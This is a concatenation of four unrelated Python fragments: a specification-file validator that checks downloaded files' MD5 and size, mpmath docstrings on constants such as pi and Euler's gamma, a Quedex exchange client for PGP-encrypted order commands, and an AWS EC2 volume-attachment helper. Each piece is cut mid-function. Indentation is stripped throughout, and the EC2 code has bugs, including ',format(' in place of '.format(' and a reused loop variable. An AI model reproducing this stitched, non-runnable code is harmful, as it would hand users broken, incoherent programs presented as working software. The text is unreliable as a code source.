elif component_name == SPECIFICATION_DESCRIPTION:
return DescriptionComponent(component_name, component_json)
elif component_name == HARDWARE:
return HardwareComponent(component_name, component_json)
elif component_name == KERNEL:
return KernelComponent(component_name, component_json)
elif component_name == OS:
return OsComponent(component_name, component_json)
elif component_name == PACKAGE_MANAGER:
return PackageManagerComponent(component_name, component_json)
elif component_name == SOFTWARE:
return SoftwareComponent(component_name, component_json)
elif component_name == DATA_FILES:
return DataFileComponent(component_name, component_json)
elif component_name == ENVIRONMENT_VARIABLES:
return EnvironmentVariableComponent(component_name, component_json)
elif component_name == COMMANDS:
return CommandComponent(component_name, component_json)
elif component_name == OUTPUT:
return OutputComponent(component_name, component_json)
else:
raise ValueError("There is no component called " + str(component_name))
class MissingComponent(Component):
def validate(self, error_log, callback_function=None, *args):
raise MissingComponentError("Component " + str(self.name) + " doesn't exist")
class FileInfo(Component):
_type = dict
_required_keys = {
ID: {
TYPE: (str, unicode),
},
URL_SOURCES: {
TYPE: list,
NEST: {
TYPE: (str, unicode),
},
},
FILE_FORMAT: {
TYPE: (str, unicode),
},
MD5: {
TYPE: (str, unicode),
},
# FILE_SIZE should later be changed to int
FILE_SIZE: {
TYPE: (str, unicode),
},
MOUNT_POINT: {
TYPE: (str, unicode),
},
}
def __init__(self, file_name, component_name, component_json=None):
super(FileInfo, self).__init__(component_name, component_json)
self.file_name = file_name
def validate(self, error_log, callback_function=None, *args):
is_valid = super(FileInfo, self).validate(error_log)
if is_valid:
if not isinstance(self.component_json[URL_SOURCES], list):
raise TypeError('"' + URL_SOURCES + '"' + " must be a list")
file_info = self._get_file_info()
for url in file_info[URL_SOURCES]:
md5, file_size = self._get_md5_and_file_size(error_log, url, file_info, callback_function, *args)
if file_size and file_size != int(file_info[FILE_SIZE]):
is_valid = False
umbrella_error = UmbrellaError(
error_code=WRONG_FILE_SIZE_ERROR_CODE,
description="File size was " + str(file_size) +
" bytes but the specification says it should be " + str(file_info[FILE_SIZE]) +
" bytes",
may_be_temporary=False,
component_name=self.name,
file_name=file_info[FILE_NAME],
url=url
)
error_log.append(umbrella_error)
# error_log.append(
# "The file named " + str(file_info[FILE_NAME]) + " on component " + str(file_info[COMPONENT_NAME]) +
# " had a file size of " + str(file_size) + " but the specification says it should be " +
# str(file_info[FILE_SIZE])
# )
if md5 and md5 != file_info[MD5]:
is_valid = False
umbrella_error = UmbrellaError(
error_code=WRONG_MD5_ERROR_CODE,
description="Checksum was \"" + str(md5) + "\" but the specification says it should be " +
str(file_info[MD5]),
may_be_temporary=False,
component_name=self.name,
file_name=file_info[FILE_NAME],
url=url
)
error_log.append(umbrella_error)
# error_log.append(
# "The file named " + str(file_info[FILE_NAME]) + " on component " +
# str(file_info[COMPONENT_NAME]) + " from the url source of " + str(url) +
# " had a calculated md5 of " + str(md5) + " but the specification says it should be " +
# str(file_info[MD5])
# )
return is_valid
def _get_file_info(self):
file_info = {}
file_info[FILE_NAME] = self.file_name
file_info[COMPONENT_NAME] = self.name
file_info[URL_SOURCES] = self.component_json[URL_SOURCES]
file_info[MD5] = self.component_json[MD5]
file_info[FILE_SIZE] = self.component_json[FILE_SIZE]
return file_info
def _get_md5_and_file_size(self, error_log, the_file_or_url, file_info, callback_function=None, *args):
if hasattr(the_file_or_url, "read"):
return self._get_md5_and_file_size_via_file(the_file_or_url, file_info[FILE_SIZE], callback_function, *args)
elif isinstance(the_file_or_url, (str, unicode)):
return self._get_md5_and_file_size_via_url(error_log, the_file_or_url, file_info, callback_function, *args)
else:
raise ValueError("the_file_or_url must be a file or a string form of a url")
def _get_md5_and_file_size_via_file(self, the_file, actual_file_size, callback_function=None, *args):
if not hasattr(the_file, "read"):
raise ValueError("the_file must be an open file ")
return get_md5_and_file_size(the_file, actual_file_size, callback_function, *args)
def _get_md5_and_file_size_via_url(self, error_log, url, file_info, callback_function=None, *args):
if not isinstance(url, (str, unicode)):
raise ValueError("Url must be in string form ")
try:
remote = urllib2.urlopen(url)
except urllib2.HTTPError as error:
umbrella_error = UmbrellaError(
error_code=BAD_URL_ERROR_CODE, description="Http error \"" + str(error) + '"',
may_be_temporary=True, component_name=str(file_info[COMPONENT_NAME]), file_name=str(file_info[FILE_NAME]),
url=str(url)
)
error_log.append(umbrella_error)
return None, None
except urllib2.URLError as error:
umbrella_error = UmbrellaError(
error_code=BAD_URL_ERROR_CODE, description="Url error \"" + str(error) + '"',
may_be_temporary=True, component_name=str(file_info[COMPONENT_NAME]), file_name=str(file_info[FILE_NAME]),
url=str(url)
)
error_log.append(umbrella_error)
return None, None
# Get the file_size from the website. Some websites (old ones) may not give this information
try:
file_size_from_url = int(remote.headers["content-length"])
except KeyError:
file_size_from_url = None
return get_md5_and_file_size(remote, file_size_from_url, callback_function, *args)
class OsFileInfo(FileInfo):
_required_keys = {
ID: {
TYPE: (str, unicode),
},
URL_SOURCES: {
TYPE: list,
NEST: {
TYPE: (str, unicode),
},
},
FILE_FORMAT: {
TYPE: (str, unicode),
},
MD5: {
TYPE: (str, unicode),
},
# FILE_SIZE should later be changed to int
FILE_SIZE: {
TYPE: (str, unicode),
},
}
class NameComponent(Component):
_type = (str, unicode)
_required_keys = {}
is_required = False
def validate(self, error_log, | |
"""
Extended docstrings for functions.py
"""
pi = r"""
`\pi`, roughly equal to 3.141592654, represents the area of the unit
circle, the half-period of trigonometric functions, and many other
things in mathematics.
Mpmath can evaluate `\pi` to arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +pi
3.1415926535897932384626433832795028841971693993751
This shows digits 99991-100000 of `\pi` (the last digit is actually
a 4 when the decimal expansion is truncated, but here the nearest
rounding is used)::
>>> mp.dps = 100000
>>> str(pi)[-10:]
'5549362465'
**Possible issues**
:data:`pi` always rounds to the nearest floating-point
number when used. This means that exact mathematical identities
involving `\pi` will generally not be preserved in floating-point
arithmetic. In particular, multiples of :data:`pi` (except for
the trivial case ``0*pi``) are *not* the exact roots of
:func:`~mpmath.sin`, but differ roughly by the current epsilon::
>>> mp.dps = 15
>>> sin(pi)
1.22464679914735e-16
One solution is to use the :func:`~mpmath.sinpi` function instead::
>>> sinpi(1)
0.0
See the documentation of trigonometric functions for additional
details.
**References**
* [BorweinBorwein]_
"""
degree = r"""
Represents one degree of angle, `1^{\circ} = \pi/180`, or
about 0.01745329. This constant may be evaluated to arbitrary
precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +degree
0.017453292519943295769236907684886127134428718885417
The :data:`degree` object is convenient for conversion
to radians::
>>> sin(30 * degree)
0.5
>>> asin(0.5) / degree
30.0
"""
e = r"""
The transcendental number `e` = 2.718281828... is the base of the
natural logarithm (:func:`~mpmath.ln`) and of the exponential function
(:func:`~mpmath.exp`).
Mpmath can be evaluate `e` to arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +e
2.7182818284590452353602874713526624977572470937
This shows digits 99991-100000 of `e` (the last digit is actually
a 5 when the decimal expansion is truncated, but here the nearest
rounding is used)::
>>> mp.dps = 100000
>>> str(e)[-10:]
'2100427166'
**Possible issues**
:data:`e` always rounds to the nearest floating-point number
when used, and mathematical identities involving `e` may not
hold in floating-point arithmetic. For example, ``ln(e)``
might not evaluate exactly to 1.
In particular, don't use ``e**x`` to compute the exponential
function. Use ``exp(x)`` instead; this is both faster and more
accurate.
"""
phi = r"""
Represents the golden ratio `\phi = (1+\sqrt 5)/2`,
approximately equal to 1.6180339887. To high precision,
its value is::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +phi
1.6180339887498948482045868343656381177203091798058
Formulas for the golden ratio include the following::
>>> (1+sqrt(5))/2
1.6180339887498948482045868343656381177203091798058
>>> findroot(lambda x: x**2-x-1, 1)
1.6180339887498948482045868343656381177203091798058
>>> limit(lambda n: fib(n+1)/fib(n), inf)
1.6180339887498948482045868343656381177203091798058
"""
euler = r"""
Euler's constant or the Euler-Mascheroni constant `\gamma`
= 0.57721566... is a number of central importance to
number theory and special functions. It is defined as the limit
.. math ::
\gamma = \lim_{n\to\infty} H_n - \log n
where `H_n = 1 + \frac{1}{2} + \ldots + \frac{1}{n}` is a harmonic
number (see :func:`~mpmath.harmonic`).
Evaluation of `\gamma` is supported at arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +euler
0.57721566490153286060651209008240243104215933593992
We can also compute `\gamma` directly from the definition,
although this is less efficient::
>>> limit(lambda n: harmonic(n)-log(n), inf)
0.57721566490153286060651209008240243104215933593992
This shows digits 9991-10000 of `\gamma` (the last digit is actually
a 5 when the decimal expansion is truncated, but here the nearest
rounding is used)::
>>> mp.dps = 10000
>>> str(euler)[-10:]
'4679858166'
Integrals, series, and representations for `\gamma` in terms of
special functions include the following (there are many others)::
>>> mp.dps = 25
>>> -quad(lambda x: exp(-x)*log(x), [0,inf])
0.5772156649015328606065121
>>> quad(lambda x,y: (x-1)/(1-x*y)/log(x*y), [0,1], [0,1])
0.5772156649015328606065121
>>> nsum(lambda k: 1/k-log(1+1/k), [1,inf])
0.5772156649015328606065121
>>> nsum(lambda k: (-1)**k*zeta(k)/k, [2,inf])
0.5772156649015328606065121
>>> -diff(gamma, 1)
0.5772156649015328606065121
>>> limit(lambda x: 1/x-gamma(x), 0)
0.5772156649015328606065121
>>> limit(lambda x: zeta(x)-1/(x-1), 1)
0.5772156649015328606065121
>>> (log(2*pi*nprod(lambda n:
... exp(-2+2/n)*(1+2/n)**n, [1,inf]))-3)/2
0.5772156649015328606065121
For generalizations of the identities `\gamma = -\Gamma'(1)`
and `\gamma = \lim_{x\to1} \zeta(x)-1/(x-1)`, see
:func:`~mpmath.psi` and :func:`~mpmath.stieltjes` respectively.
**References**
* [BorweinBailey]_
"""
catalan = r"""
Catalan's constant `K` = 0.91596559... is given by the infinite
series
.. math ::
K = \sum_{k=0}^{\infty} \frac{(-1)^k}{(2k+1)^2}.
Mpmath can evaluate it to arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +catalan
0.91596559417721901505460351493238411077414937428167
One can also compute `K` directly from the definition, although
this is significantly less efficient::
>>> nsum(lambda k: (-1)**k/(2*k+1)**2, [0, inf])
0.91596559417721901505460351493238411077414937428167
This shows digits 9991-10000 of `K` (the last digit is actually
a 3 when the decimal expansion is truncated, but here the nearest
rounding is used)::
>>> mp.dps = 10000
>>> str(catalan)[-10:]
'9537871504'
Catalan's constant has numerous integral representations::
>>> mp.dps = 50
>>> quad(lambda x: -log(x)/(1+x**2), [0, 1])
0.91596559417721901505460351493238411077414937428167
>>> quad(lambda x: atan(x)/x, [0, 1])
0.91596559417721901505460351493238411077414937428167
>>> quad(lambda x: ellipk(x**2)/2, [0, 1])
0.91596559417721901505460351493238411077414937428167
>>> quad(lambda x,y: 1/(1+(x*y)**2), [0, 1], [0, 1])
0.91596559417721901505460351493238411077414937428167
As well as series representations::
>>> pi*log(sqrt(3)+2)/8 + 3*nsum(lambda n:
... (fac(n)/(2*n+1))**2/fac(2*n), [0, inf])/8
0.91596559417721901505460351493238411077414937428167
>>> 1-nsum(lambda n: n*zeta(2*n+1)/16**n, [1,inf])
0.91596559417721901505460351493238411077414937428167
"""
khinchin = r"""
Khinchin's constant `K` = 2.68542... is a number that
appears in the theory of continued fractions. Mpmath can evaluate
it to arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +khinchin
2.6854520010653064453097148354817956938203822939945
An integral representation is::
>>> I = quad(lambda x: log((1-x**2)/sincpi(x))/x/(1+x), [0, 1])
>>> 2*exp(1/log(2)*I)
2.6854520010653064453097148354817956938203822939945
The computation of ``khinchin`` is based on an efficient
implementation of the following series::
>>> f = lambda n: (zeta(2*n)-1)/n*sum((-1)**(k+1)/mpf(k)
... for k in range(1,2*int(n)))
>>> exp(nsum(f, [1,inf])/log(2))
2.6854520010653064453097148354817956938203822939945
"""
glaisher = r"""
Glaisher's constant `A`, also known as the Glaisher-Kinkelin
constant, is a number approximately equal to 1.282427129 that
sometimes appears in formulas related to gamma and zeta functions.
It is also related to the Barnes G-function (see :func:`~mpmath.barnesg`).
The constant is defined as `A = \exp(1/12-\zeta'(-1))` where
`\zeta'(s)` denotes the derivative of the Riemann zeta function
(see :func:`~mpmath.zeta`).
Mpmath can evaluate Glaisher's constant to arbitrary precision:
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +glaisher
1.282427129100622636875342568869791727767688927325
We can verify that the value computed by :data:`glaisher` is
correct using mpmath's facilities for numerical
differentiation and arbitrary evaluation of the zeta function:
>>> exp(mpf(1)/12 - diff(zeta, -1))
1.282427129100622636875342568869791727767688927325
Here is an example of an integral that can be evaluated in
terms of Glaisher's constant:
>>> mp.dps = 15
>>> quad(lambda x: log(gamma(x)), [1, 1.5])
-0.0428537406502909
>>> -0.5 - 7*log(2)/24 + log(pi)/4 + 3*log(glaisher)/2
-0.042853740650291
Mpmath computes Glaisher's constant by applying Euler-Maclaurin
summation to a slowly convergent series. The implementation is
reasonably efficient up to about 10,000 digits. See the source
code for additional details.
References:
http://mathworld.wolfram.com/Glaisher-KinkelinConstant.html
"""
apery = r"""
Represents Apery's constant, which is the irrational number
approximately equal to 1.2020569 given by
.. math ::
\zeta(3) = \sum_{k=1}^\infty\frac{1}{k^3}.
The calculation is based on an efficient hypergeometric
series. To 50 decimal places, the value is given by::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +apery
1.2020569031595942853997381615114499907649862923405
Other ways to evaluate Apery's constant using mpmath
include::
>>> zeta(3)
1.2020569031595942853997381615114499907649862923405
>>> -psi(2,1)/2
1.2020569031595942853997381615114499907649862923405
>>> 8*nsum(lambda k: 1/(2*k+1)**3, [0,inf])/7
1.2020569031595942853997381615114499907649862923405
>>> f = lambda k: 2/k**3/(exp(2*pi*k)-1)
>>> 7*pi**3/180 - nsum(f, [1,inf])
1.2020569031595942853997381615114499907649862923405
This shows digits 9991-10000 of Apery's constant::
>>> mp.dps = 10000
>>> str(apery)[-10:]
'3189504235'
"""
mertens = r"""
Represents the Mertens or Meissel-Mertens constant, which is the
prime number analog of Euler's constant:
.. math ::
B_1 = \lim_{N\to\infty}
\left(\sum_{p_k \le N} \frac{1}{p_k} - \log \log N \right)
Here `p_k` denotes the `k`-th prime number. Other names for this
constant include the Hadamard-de la Vallee-Poussin constant or
the prime reciprocal constant.
The following gives the Mertens constant to 50 digits::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +mertens
0.2614972128476427837554268386086958590515666482612
References:
http://mathworld.wolfram.com/MertensConstant.html
"""
twinprime = r"""
Represents the twin prime constant, which is the factor `C_2`
featuring in the Hardy-Littlewood conjecture for the growth of the
twin prime counting function,
.. math ::
\pi_2(n) \sim 2 C_2 \frac{n}{\log^2 n}.
It is given by the product over primes
.. math ::
C_2 = \prod_{p\ge3} \frac{p(p-2)}{(p-1)^2} \approx 0.66016
Computing `C_2` to 50 digits::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +twinprime
0.66016181584686957392781211001455577843262336028473
References:
http://mathworld.wolfram.com/TwinPrimesConstant.html
"""
ln = r"""
Computes the natural logarithm of `x`, `\ln x`.
See :func:`~mpmath.log` for additional documentation."""
sqrt = r"""
``sqrt(x)`` gives the principal square root of `x`, `\sqrt x`.
For positive real numbers, the principal root is simply the
positive square root. For arbitrary complex numbers, the principal
square root is defined to satisfy `\sqrt x = \exp(\log(x)/2)`.
The function thus has a branch cut along the negative half real axis.
For all mpmath numbers ``x``, calling ``sqrt(x)`` is equivalent to
performing ``x**0.5``.
**Examples**
Basic examples and limits::
>>> from mpmath import *
>>> mp.dps = 15; mp.pretty = True
>>> sqrt(10)
3.16227766016838
>>> sqrt(100)
| |
<filename>quedex_api/user_stream.py
import json
import pgpy
class UserStreamListener(object):
def on_ready(self):
"""
Called when UserStream is ready to start receiving messages and sending commands. Immediately
after this method is called you will receive a "welcome pack" of messages to this listener which
will consist of order_placed messages for every pending order, open_position for every open
position and an initial account_state (see on_order_placed, on_open_position, on_account_state
methods, respectively).
"""
pass
def on_message(self, message):
"""
Called on every received message.
"""
pass
def on_account_state(self, account_state):
"""
:param account_state: a dict of the following format:
{
"type": "account_state",
"balance": "<decimal as string>",
"free_balance": "<decimal as string>",
"total_initial_margin": "<decimal as string>",
"total_maintenance_margin": "<decimal as string>",
"total_unsettled_pnl": "<decimal as string>",
"total_locked_for_orders": "<decimal as string>",
"total_pending_withdrawal": "<decimal as string>",
"account_status": "active"/"margin_call"/"liquidation",
}
"""
pass
def on_open_position(self, open_position):
"""
:param open_position: a dict of the following format:
{
"type": "open_position",
"instrument_id": "<string id of the instrument>",
"pnl": "<decimal as string>", // futures only
"maintenance_margin": "<decimal as string>",
"initial_margin": "<decimal as string>",
"side": "long"/"short",
"quantity": <integer>,
"average_opening_price": "<decimal as string>",
}
"""
pass
def on_order_placed(self, order_placed):
"""
:param order_placed: a dict of the following format:
{
"type": "order_placed",
"client_order_id": "<string id>",
"instrument_id": "<string id of the instrument>",
"limit_price": "<decimal as string>",
"side": "buy"/"sell",
"quantity": <integer>,
}
"""
pass
def on_order_place_failed(self, order_place_failed):
"""
:param order_place_failed: a dict of the following format:
{
"client_order_id": "<string id>",
}
"""
pass
def on_order_cancelled(self, order_cancelled):
"""
:param order_cancelled: a dict of the following format:
{
"client_order_id": "<string id>",
}
"""
pass
def on_order_forcefully_cancelled(self, order_forcefully_cancelled):
"""
:param order_forcefully_cancelled: a dict of the following format:
{
"client_order_id": "<string id>",
"cause": "liquidation"/"settlement",
}
"""
pass
def on_order_cancel_failed(self, order_cancel_failed):
"""
:param order_cancel_failed: a dict of the following format:
{
"client_order_id": "<string id>",
}
"""
pass
def on_all_orders_cancelled(self, all_orders_cancelled):
"""
:param all_orders_cancelled: dummy parameter, reserved for future extensions
"""
pass
def on_cancel_all_orders_failed(self, cancel_all_orders_failed):
"""
:param cancel_all_orders_failed: a dict of the following format:
{
"cause": "session_not_active",
}
"""
pass
def on_order_modified(self, order_modified):
"""
:param order_modified: a dict of the following format:
{
"client_order_id": "<string id>",
}
"""
pass
def on_order_modification_failed(self, order_modification_failed):
"""
:param order_cancel_failed: a dict of the following format:
{
"client_order_id": "<string id>",
}
"""
pass
def on_order_filled(self, order_filled):
"""
:param order_filled: a dict of the following format:
{
"client_order_id": "<string id>",
"trade_price": "<decimal as string>",
"trade_quantity": <integer>,
"leaves_order_quantity": <integer>,
}
"""
pass
def on_error(self, error):
"""
Called when an error with market stream occurs (data parsing, signature verification, webosocket
error). This means a serious problem, which should be investigated (cf. on_disconnect).
:type error: subtype of Exception
"""
pass
def on_disconnect(self, message):
"""
Called when market stream disconnects cleanly (exchange going down for maintenance, network
problem, etc.). The client should reconnect in such a case.
:param message: string message with reason of the disconnect
"""
pass
class UserStream(object):
"""
Use this class to connect to the user stream at Quedex, i.e. to the stream of private, realtime
data for your account with order confirmations, funds updates, etc.; the stream also
allows sending commands to the exchange such as placing, cancelling orders, etc. The data is
exchanged in the form of PGP-encrypted JSON messages - all parsing, decryption/encryption and
verification/signing is handled internally and the client receives and sends Python objects (dicts
with data).
To use this class, implement your own UserStreamListener (you may inherit from the base class,
but that's not necessary) and add an instance via add_listener method. Methods of listener will
be called when respective objects arrive on the market stream. For the format of the data see
comments on UserStreamListener. To send commands to the exchange call respective methods of this
class - see their comments for the format of the data.
"""
def __init__(self, exchange, trader, nonce_group=5):
"""
:param nonce_group: value between 0 and 9, has to be different for every WebSocket connection
opened to the exchange (e.g. browser and trading bot); our webapp uses
nonce_group=0
"""
super(UserStream, self).__init__()
self.send_message = None
self.user_stream_url = exchange.user_stream_url
self._exchange = exchange
self._trader = trader
self._listeners = []
self._nonce_group = nonce_group
self._nonce = None
self._initialized = False
self._batching = False
self._batch = None
def add_listener(self, listener):
self._listeners.append(listener)
def remove_listener(self, listener):
self._listeners.remove(listener)
def place_order(self, place_order_command):
"""
:param place_order_command: a dict of the following format:
{
"client_order_id": <positive integer id unique among orders>,
"instrument_id": "<string id of the instrument>",
"order_type": "limit",
"limit_price": "<decimal as string>",
"side": "buy"/"sell",
"quantity": <integer>,
}
"""
self._check_if_initialized()
place_order_command['type'] = 'place_order'
check_place_order(place_order_command)
self._set_nonce_account_id(place_order_command)
if self._batching:
self._batch.append(place_order_command)
else:
self._encrypt_send(place_order_command)
def cancel_order(self, cancel_order_command):
"""
:param cancel_order_command: a dict of the following format:
{
"client_order_id": <positive integer id of the order to cancel>,
}
"""
self._check_if_initialized()
check_cancel_order(cancel_order_command)
cancel_order_command['type'] = 'cancel_order'
self._set_nonce_account_id(cancel_order_command)
if self._batching:
self._batch.append(cancel_order_command)
else:
self._encrypt_send(cancel_order_command)
def cancel_all_orders(self):
self._check_if_initialized()
cancel_all_orders_command = {'type': 'cancel_all_orders'}
self._set_nonce_account_id(cancel_all_orders_command)
if self._batching:
self._batch.append(cancel_all_orders_command)
else:
self._encrypt_send(cancel_all_orders_command)
def modify_order(self, modify_order_command):
"""
:param modify_order_command: a dict of the following format:
{
"client_order_id": <positive integer id of the order to modify>,
"new_limit_price": "<decimal as string>",
"new_quantity": <integer>,
}
"""
self._check_if_initialized()
check_modify_order(modify_order_command)
modify_order_command['type'] = 'modify_order'
self._set_nonce_account_id(modify_order_command)
if self._batching:
self._batch.append(modify_order_command)
else:
self._encrypt_send(modify_order_command)
def batch(self, order_commands):
"""
:param order_commands: a list with a number of commands where the following are possible:
[
{
"type": "place_order",
// for the rest of the fields see place_order method
},
{
"type": "cancel_order",
// for the rest of the fields see cancel_order method
},
{
"type": "modify_order",
// for the rest of the fields see modify_order method
},
{
"type": "cancel_all_orders",
},
...
]
"""
self._check_if_initialized()
for command in order_commands:
type = command['type']
if type == 'place_order':
check_place_order(command)
elif type == 'cancel_order':
check_cancel_order(command)
elif type == 'modify_order':
check_modify_order(command)
elif type == 'cancel_all_orders':
check_cancel_all_orders(command)
else:
raise ValueError('Unsupported command type: ' + type)
self._set_nonce_account_id(command)
self._send_batch_no_checks(order_commands)
def start_batch(self):
"""
After this method is called all calls to place_order, cancel_order, modify_order result in
caching of the commands which are then sent once send_batch is called.
"""
self._batch = []
self._batching = True
def send_batch(self):
"""
Sends batch created from calling place_order, cancel_order, modify_order after calling
start_batch.
"""
if not self._batching:
raise Exception('send_batch called without calling start_batch first')
self._send_batch_no_checks(self._batch)
self._batch = None
self._batching = False
def _send_batch_no_checks(self, order_commands):
self._encrypt_send({
'type': 'batch',
'account_id': self._trader.account_id,
'batch': order_commands,
})
def initialize(self):
self._encrypt_send({
'type': 'get_last_nonce',
'nonce_group': self._nonce_group,
'account_id': self._trader.account_id,
})
def on_message(self, message_wrapper_str):
try:
message_wrapper = json.loads(message_wrapper_str)
message_type = message_wrapper['type']
if message_type == 'keepalive':
return
elif message_type == 'error':
self.process_error(message_wrapper)
elif message_type == 'data':
self.process_data(message_wrapper)
else:
# no-op
return
except Exception as e:
self.on_error(e)
def process_error(self, message_wrapper):
# error_code == maintenance accompanies exchange engine going down for maintenance which
# causes graceful disconnect of the WebSocket, handled by MarketStreamListener.on_disconnect
if message_wrapper['error_code'] != 'maintenance':
self.on_error(Exception('WebSocket error: ' + message_wrapper['error_code']))
def process_data(self, message_wrapper):
for entity in self._decrypt(message_wrapper['data']):
if entity['type'] == 'last_nonce' and entity['nonce_group'] == self._nonce_group:
self._nonce = entity['last_nonce']
self._encrypt_send(self._set_nonce_account_id({'type': 'subscribe'}))
return
elif entity['type'] == 'subscribed' and entity['message_nonce_group'] == self._nonce_group:
self._initialized = True
self._call_listeners('on_ready')
continue
self._call_listeners('on_message', entity)
self._call_listeners('on_' + entity['type'], entity)
def on_error(self, error):
self._call_listeners('on_error', error)
def on_disconnect(self, message):
self._call_listeners('on_disconnect', message)
def _set_nonce_account_id(self, entity):
self._nonce += 1
entity['nonce'] = self._nonce
entity['nonce_group'] = self._nonce_group
entity['account_id'] = self._trader.account_id
return entity
def _encrypt_send(self, entity):
message = pgpy.PGPMessage.new(json.dumps(entity))
message |= self._trader.private_key.sign(message)
# explicit encode for Python 3 compatibility
self.send_message(str(self._exchange.public_key.encrypt(message)).encode('utf8'))
def _decrypt(self, encrypted_str):
encrypted = pgpy.PGPMessage().from_blob(encrypted_str)
decrypted = self._trader.private_key.decrypt(encrypted)
if not self._exchange.public_key.verify(decrypted):
raise AssertionError('Verification failed for message: ' + decrypted)
return json.loads(decrypted.message)
def _call_listeners(self, method_name, *args, **kwargs):
for listener in self._listeners:
if hasattr(listener, method_name):
getattr(listener, method_name)(*args, **kwargs)
def _check_if_initialized(self):
if not self._initialized:
raise Exception('UserStream not initialized, wait until UserStreamListener.on_ready is called.')
def check_place_order(place_order):
check_positive_int(place_order, 'client_order_id')
check_positive_decimal(place_order, 'limit_price')
check_positive_int(place_order, 'quantity')
check_positive_int(place_order, 'instrument_id')
side = place_order['side']
if side.lower() != 'buy' and side.lower() != 'sell':
raise ValueError('side has to be either "buy" or "sell", got: %s' % side)
order_type = place_order['order_type']
if order_type.lower() != 'limit':
raise ValueError('The only supported order_type is limit currently')
def check_cancel_order(cancel_order):
check_positive_int(cancel_order, 'client_order_id')
def check_modify_order(modify_order):
check_positive_int(modify_order, 'client_order_id')
if 'new_limit_price' in modify_order:
check_positive_decimal(modify_order, 'new_limit_price')
if 'new_quantity' in modify_order:
check_positive_int(modify_order, 'new_quantity')
if 'new_limit_price' not | |
{}".format(instance_name, region))
instance_type = cls.get_instance_type(instance_name, boto_config)
global_availability_zone = boto_config.get('availability_zone', None)
local_availability_zone = instance_config.get('availability_zone', None)
availability_zone = local_availability_zone if local_availability_zone else global_availability_zone
omit_kargs = boto_config.copy()
if 'security_groups' in omit_kargs:
del omit_kargs['security_groups']
if 'instance_type' in omit_kargs:
del omit_kargs['instance_type']
if "availability_zone" in omit_kargs:
del omit_kargs["availability_zone"]
instance_infos = cls.create_instances(key_name, max_count, image_id, instance_type, security_groups,
instance_tag_specifigations, availability_zone, region=region, **omit_kargs)
if instance_infos is None:
raise Exception("Failed to create instance: {}".format(instance_name))
# create volumes in same zone
instance_ids = list(instance_infos.keys())
instance_statuses = cls.wait_for_instances(instance_ids)
volume_names = instance_config.get('volumes', [])
volume_results = {}
if len(volume_names) > 0:
# create the volume
cls.LOGGER.info("Attaching {} volumes for '{}' in {}".format(len(volume_names), instance_name, region))
volume_results = cls.attach_instances_to_volumes(instance_name, instance_statuses, volume_names, boto_config)
return instance_infos, volume_results
@classmethod
def attach_instances_to_volumes(cls, instance_name, instance_statuses, volume_names, boto_config):
availability_zones = cls.get_instances_zone(instance_ids=list(instance_statuses.keys()), **boto_config)
volume_configs = cls.get_volume_descriptions(boto_config)
device_configs = {k['volume']: k for k in cls.get_volume_device_descriptions(instance_name, volume_names, boto_config)}
volume_results = {}
for name in volume_names:
volume_config = volume_configs.get(name, None)
device_config = device_configs.get(name, {})
volume_results[name] = {}
if volume_config is None or len(volume_config) == 0 or \
device_config is None or len(device_config) == 0:
raise Exception("Attempting to create a volume ({}) for {}, but the device or volume configs are missing",format(name, instance_name))
device_name = device_config['device']
size = volume_config.get('size', None)
availability_zone = volume_config.get('availability_zone', None)
snapshotid = volume_config.get('snapshotid', None)
volumetype = volume_config.get('volumetype', 'standard')
multiattach = volume_config.get('multiattachenabled', False)
encrypted = volume_config.get('encrypted', False)
tags = volume_config.get('tag_specs', [])
tag_specifications = cls.get_tag_specs_configs(boto_config, tag_specs_names=tags, resource_type='volume')
size = volume_config.get('size', 100)
vids = []
for instance_id, instance_info in instance_statuses.items():
availability_zone = availability_zones[instance_id]
cls.LOGGER.debug("Creating volume {} ({}:{}G) for '{}:{}' in {}".format(name, volumetype, size, instance_name,instance_name, availability_zone))
vid = cls.create_volume(availability_zone=availability_zone, snapshotid=snapshotid,
volumetype=volumetype, multiattach=multiattach, encrypted=encrypted,
tags=tag_specifications, size=size, **boto_config)
volume_results[name][instance_id] = {'volume_id': vid,
'volume_name': name,
'instance_name': instance_name,
'device': device_name,
'attached': False,
'response': None}
# use this to capture arguments and attach each volume once they
# are all available
vids.append([vid, (instance_id, vid, device_name)])
# wait for all the volumes to be available before attaching them
_ = cls.wait_for_volumes([i[0] for i in vids], **boto_config)
for vid, args in vids:
if vid:
rsp = cls.attach_volume(*args, **boto_config)
volume_results[name][instance_id]['response'] = rsp
volume_results[name][instance_id]['attached'] = True
return volume_results
@classmethod
def get_availability_zones(cls, **kargs):
ec2 = cls.get_ec2(**kargs)
zones = ec2.describe_availability_zones()['AvailabilityZones']
az = [z['ZoneName'] for z in zones if z['State'].lower() == 'available']
return az
@classmethod
def attach_volume(cls, instance_id, volume_id, device_name, **kargs):
ec2 = cls.get_ec2(**kargs)
cls.LOGGER.info("Attaching volume ({}) to '{}' as {}".format(instance_id, volume_id, device_name))
rsp = ec2.attach_volume(InstanceId=instance_id, VolumeId=volume_id, Device=device_name)
return rsp
@classmethod
def get_volumes(cls, volume_ids=None, volume_id=None, **kargs):
volume_ids = volume_ids if volume_ids is not None else []
if volume_id is not None:
volume_ids.append(volume_id)
ec2 = cls.get_ec2(**kargs)
volumes = []
if len(volume_ids) == 0:
rsp = ec2.describe_volumes()
volumes = rsp["Volumes"]
else:
rsp = ec2.describe_volumes(VolumeIds=volume_ids)
volumes = rsp["Volumes"]
if len(volumes) > 0:
return {k["VolumeId"]: k for k in volumes}
return {}
@classmethod
def find_attached_volumes(cls, volume_id=None, volume_ids=None, ignore_device_names=['/dev/sda1'], **kargs):
volume_infos = cls.get_volumes(volume_id=volume_id, volume_ids=volume_ids)
attached = {}
if ignore_device_names is None:
ignore_device_names = []
for vid, info in volume_infos.items():
